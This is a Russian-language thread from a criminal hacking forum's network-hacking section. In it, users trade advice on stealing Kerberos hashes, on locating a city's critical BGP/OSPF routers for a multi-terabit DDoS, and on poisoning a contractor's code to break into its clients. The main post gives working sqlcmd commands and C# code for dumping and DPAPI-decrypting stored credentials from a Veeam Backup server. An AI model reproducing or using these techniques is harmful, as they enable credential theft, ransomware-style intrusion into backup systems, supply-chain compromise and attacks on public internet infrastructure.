• XSS.stack #1 – первый литературный журнал от юзеров форума

[net-hacking] Вопросы по сетям

бери в руки керберос, снимай с него хеш
(гугли kerberoasting, asreproasting еще недавно появился timeroasting но он актуален только в больших сетях)
Имеешь в этом опыт ?
 
Друзья всем привет!
Кто может подсказать как снять kerberos hash

Приветствую, воспользуйся Mimikatz или Rubeus для получения хеша
 
как можно отследить критически важные сетевые ноды городского интернета (BGP, OSPF) для точечной атаки по L3 только через mtr, tcptraceroute? И хватит ли нагрузки в 5tbps+ что бы задушить несколько таких?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
как можно отследить критически важные сетевые ноды городского интернета (BGP, OSPF) для точечной атаки по L3 только через mtr, tcptraceroute? И хватит ли нагрузки в 5tbps+ что бы задушить несколько таких?
Маршрутизируемые сети и автономные зоны погут не совпадать с административными территориями. Тут могут оказаться важнее точки обмена трафиком.
 
как можно отследить критически важные сетевые ноды городского интернета (BGP, OSPF) для точечной атаки по L3 только через mtr, tcptraceroute? И хватит ли нагрузки в 5tbps+ что бы задушить несколько таких?
BGP это 179/TCP порт, одна AS'ка другой AS'ке аннонсит туда. ну и собсно 179/TCP смотришь где и туда лупишь!... не? ;-)
а нафига интернет ломать то?

куда сложнее с OSPF - он на IP уровне L3, просто protocol number у пакетов 89 (а у TCP это 6, а у UDP это 17) ...
древний RIP это 520/TCP

https://en.wikipedia.org/wiki/List_of_IP_protocol_numbers - L3 чего в сетевых бегает
https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers - L4 порты чего в транспортных TCP или UDP (у остальных ваще другой формат без портов)
 
допустим есть к1, что занимается вебдезигном для больших дядь, у самой собственно нефига. Но неожиданно есть руты к одному из серваков, который собственно они деплоят. ССШ ключи хоть куда то и ведут, но по сути ведут к сайту (рутовые) самих разрабов. Ни VPN ничего дальше не нашли. Как предлагаете двигаться? Есть +- устаревшие но все еще живые бд. Есть также понимание, что мы сидим в qemu сети, но просто так в сам qemu не вылезешь.

Как лучше всего двинуться дальше? Креды что и есть это обычно от цмс, других клиентов конторы, т.е. ничего такого что бы доступ в сеть дало.
Тут скорее вопрос побрейнштормить..
 
ССШ ключи хоть куда то и ведут, но по сути ведут к сайту (рутовые) самих разрабов.
Дык поздравы! Этож 3-е место в OWASP TOP 10 2025. Отравляете код (вот тут главное не спалиться) и внедряетесь везде куда разрабы это дело раскатывают. Или я чего-то не понял?
 
Дык поздравы! Этож 3-е место в OWASP TOP 10 2025. Отравляете код (вот тут главное не спалиться) и внедряетесь везде куда разрабы это дело раскатывают. Или я чего-то не понял?
Судя по всему, мы уже в эндпоинтах раскатанных. Не, раскатать страшилки по всему что развернуто можно, для клиентсайда, но хочется в сетки самих клиентов вебмастерской.
Да и деплоится судя по всему что я там вижу, вручную через scp. Хотя там есть какая то админка, может из нее выход есть, или переходы по другим сервисам.
 
берешь серв где у тебя виам. снимаешь такслист

Код:
tasklist /v

ищешь PID от sqlservr.exe

Код:
netstat -ano

потом с этого же серва снимаешь netstat -ano и ишешь порт по пиду sqlservr.ехе

Пример вывода

Код:
sqlservr.exe                  1328 Services                   0  1,016,020 K
1328
--
вбивиаем в нетсате -ано
TCP    0.0.0.0:49679          0.0.0.0:0              LISTENING       1328

пид 1328
порт 49679

Ищешь порт MsSQL по PID в 2-х выводах
ищешь где лежит sqlcmd.exe
"c:\Program Files\Microsoft SQL Server\110\Tools\Binn\sqlcmd.exe" -S localhost,найденный_порт -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc]FROM [VeeamBackup].[dbo].[Credentials];"

или
Код:
sqlcmd -S localhost,найденный_порт -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc]FROM [VeeamBackup].[dbo].[Credentials];"
-
опция -y0 обязательно иначе sqlcmd режет вывод
+++
=====

дальше берёшь вот такой код и создаешь файл veeam.cs

C#:
using System;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Text;

namespace Main
{
internal static class Program
    {
    private static void Decrypt(string b,string a){
        if (string.IsNullOrEmpty(a))
        {
            return;
        }
        byte[] encryptedData = Convert.FromBase64String(a);
        Console.WriteLine(b+':'+Encoding.UTF8.GetString(ProtectedData.Unprotect(encryptedData, null, DataProtectionScope.LocalMachine)));     
        return;
    }
    private static void Main(string[] args)
        {
            Decrypt("необязательный юзернейм","тут хэш из вывода sqlcmd");
        }
 }
}


на каждый хэш отдельный вызов функции Decrypt
файл что создали с кодом выше, кладем в папку, и вызываем:

сообираешь c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe veeam.cs

полученный exe закидываешь на сервер с veeam и запускаешь

@Dropbear
Здраствуйте. Что то в новых вимах нету sqlservr.exe всё на постгресе завязанно. SQLshell не конектит в базе с ошибкой вылетает. Есть новое решение у кого нибудь? В пМ можно, дабы тему не убить )))
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх